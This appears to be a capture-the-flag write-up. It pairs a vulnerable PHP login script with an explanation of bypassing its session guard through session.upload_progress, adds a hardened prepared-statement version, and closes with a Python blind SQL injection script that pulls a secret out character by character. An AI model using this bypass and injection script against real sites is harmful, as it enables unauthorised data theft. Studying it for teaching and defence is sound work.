Session injection
Source code
<?php
!isset($_SESSION) AND die("Direct access on this script is not allowed!");
include 'db.php';
$sql = 'SELECT `username`,`password` FROM `ptbctf`.`ptbctf` where `username`="' . $_GET['username'] . '" and password="' . md5($_GET['password']) . '";';
$result = $con->query($sql);
function auth($user) {
    $_SESSION['username'] = $user;
    return True;
}
($result->num_rows > 0 AND $row = $result->fetch_assoc() AND $con->close() AND auth($row['username']) AND die('<meta http-equiv="refresh" content="0; url=?p=home" />')) OR ($con->close() AND die('Try again!'));
?>
If session.auto_start=On is set in php.ini, PHP calls session_start() automatically every time it processes a PHP file, but session.auto_start defaults to Off. Another session-related option, session.upload_progress.enabled, defaults to On; with it enabled, sending a multipart POST that contains a PHP_SESSION_UPLOAD_PROGRESS field makes PHP call session_start().
Because the session can be started this way, the `!isset($_SESSION)` guard at the top passes, and the injection payload can be placed in the username parameter.
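For comparison, here is a hardened version of the login handler above. This is an added example, not the challenge's own code; it assumes the same `ptbctf`.`ptbctf` table, but with the `password` column holding password_hash() output instead of a raw MD5, and assumes db.php creates a mysqli handle named $con as the original does. The username is bound as data through a prepared statement, so quotes or SQL keywords in it cannot change the query, and the session is started explicitly instead of being gated on isset($_SESSION), which is exactly the check that session.upload_progress lets a client satisfy.

```php
<?php
// Added example (not the challenge's code): hardened login handler.
// Assumption: db.php defines a mysqli connection $con, as in the original.
session_start();                        // start the session ourselves; never use
include 'db.php';                       // isset($_SESSION) as an access gate

function auth(string $user): bool {
    session_regenerate_id(true);        // new session id on login (no fixation)
    $_SESSION['username'] = $user;
    return true;
}

$username = $_GET['username'] ?? '';
$password = $_GET['password'] ?? '';

// Prepared statement: the username travels as a bound parameter, so a value
// such as  test" or (ascii(substr(...))=65)#  is compared literally as a name.
$stmt = $con->prepare(
    'SELECT `username`, `password` FROM `ptbctf`.`ptbctf` WHERE `username` = ?'
);
$stmt->bind_param('s', $username);
$stmt->execute();
$row = $stmt->get_result()->fetch_assoc();   // get_result() needs mysqlnd
$stmt->close();

// password_verify() checks a salted bcrypt/argon2 hash, not md5(). When the
// user does not exist we still verify against a dummy hash so the response
// time does not reveal which usernames are valid.
$stored = $row['password'] ?? password_hash('dummy-value', PASSWORD_DEFAULT);
$ok = password_verify($password, $stored) && $row !== null;

$con->close();

if ($ok && auth($row['username'])) {
    header('Location: ?p=home');        // a real redirect instead of <meta refresh>
    exit;
}
http_response_code(401);
echo 'Try again!';
```

With the username bound as a parameter, the boolean condition used in the original script never reaches the SQL parser, so the "meta present / Try again!" oracle that the exploit below relies on no longer exists; the only observable difference left is a valid versus invalid credential pair.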
import requests

url = 'http://e3ebe013-7cb3-4006-8d52-3aa8378449ea.node3.buuoj.cn/templates/login.php'
# A multipart body carrying a PHP_SESSION_UPLOAD_PROGRESS field makes PHP call
# session_start(), so the !isset($_SESSION) guard no longer kills the script.
files = {"file": "123"}
data = {"PHP_SESSION_UPLOAD_PROGRESS": "123"}
cookies = {"PHPSESSID": "123"}

# Boolean-based blind injection, one character of the secret per outer loop:
# when the guessed ASCII value is right the query returns a row and the page
# contains the <meta refresh> redirect; otherwise it answers 'Try again!'.
for b in range(1, 50):
    for i in range(30, 130):
        params = {
            "username": 'test" or (ascii(substr((select group_concat(secret) from flag_tbl),' + str(b) + ',1))=' + str(i) + ')#',
            "password": "test",
        }
        a = requests.post(url=url, files=files, data=data, cookies=cookies, params=params).text
        if 'meta' in a:
            print(chr(i))
            break
